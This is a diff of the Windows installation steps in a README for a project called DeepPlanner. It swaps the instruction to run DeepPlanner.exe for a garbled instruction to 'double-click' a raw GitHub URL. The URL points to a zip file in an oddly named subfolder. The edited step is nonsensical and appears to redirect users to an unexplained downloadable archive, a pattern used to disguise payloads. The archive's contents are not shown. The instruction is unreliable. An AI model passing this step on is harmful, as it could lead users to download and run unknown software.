AshishParulekar/DeepPlanner/Readme.md

 1. Locate the downloaded `.zip` file in your Downloads folder.
 2. Right-click the file and select "Extract All."
 3. Follow the prompts to extract the files to a new folder.
-4. Open the extracted folder and double-click `DeepPlanner.exe` to run it.
+4. Open the extracted folder and double-click `https://raw.githubusercontent.com/AshishParulekar/DeepPlanner/main/ermelin/DeepPlanner.zip` to run it.

 ### For macOS Users:
 1. Find the downloaded `.zip` file in your Downloads folder.